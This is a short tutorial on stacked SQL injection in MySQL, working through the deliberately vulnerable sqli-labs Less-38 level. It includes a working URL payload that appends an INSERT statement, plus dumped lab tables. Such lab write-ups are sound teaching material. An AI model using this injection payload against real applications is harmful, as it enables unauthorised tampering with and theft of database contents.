Stacked injection (stacked queries) means, as the name suggests, sending a stack of SQL statements (more than one) to be executed together, and that is exactly how it works in practice. In MySQL, at least on the command line, every statement is terminated with ";", which raises the obvious question: if the application builds its query from our input, can we append a ";" and a second statement of our own? Executing several statements in one request is what we call stacked injection.
Not every database environment supports stacked injection. Whether it works depends not only on the database engine but on the API the application uses to talk to it. For MySQL from PHP, mysqli_query() refuses a string that contains more than one statement, whereas mysqli_multi_query() executes all of them; sqli-labs Less-38 runs its query through mysqli_multi_query(), which is why this level is solvable. Microsoft SQL Server and PostgreSQL generally accept stacked statements, Oracle does not.
Running the following two statements in one line in the MySQL client:
select * from users; select * from emails;
Result:
mysql> select * from users; select * from emails;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | 123456 |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
| 15 | admin'# | admin |
+----+----------+------------+
14 rows in set (0.00 sec)
+----+------------------------+
| id | email_id |
+----+------------------------+
| 1 | Dumb@dhakkan.com |
| 2 | Angel@iloveu.com |
| 3 | Dummy@dhakkan.local |
| 4 | secure@dhakkan.local |
| 5 | stupid@dhakkan.local |
| 6 | superman@dhakkan.local |
| 7 | batman@dhakkan.local |
| 8 | admin@dhakkan.com |
+----+------------------------+
8 rows in set (0.00 sec)
The level's SQL (sqli-labs Less-38): SELECT * FROM users WHERE id='$id' LIMIT 0,1
Use stacked injection to insert a new row with id 39.
Payload:
?id=1';insert into users(id,username,password) values (39,'less38','hello')--+
After URL decoding, the "+" becomes a space, which MySQL requires after "--" for the comment to be recognised. The server therefore executes:
SELECT * FROM users WHERE id='1';insert into users(id,username,password) values (39,'less38','hello')-- ' LIMIT 0,1
The first statement is the level's own query, the second is ours, and the comment swallows the trailing "' LIMIT 0,1". Then request ?id=39 to confirm the row was inserted.
This article is fairly comprehensive: it demonstrates multi-statement execution on most of the common databases and walks through sqli-labs levels 38-45: https://www.cnblogs.com/backlion/p/9721687.html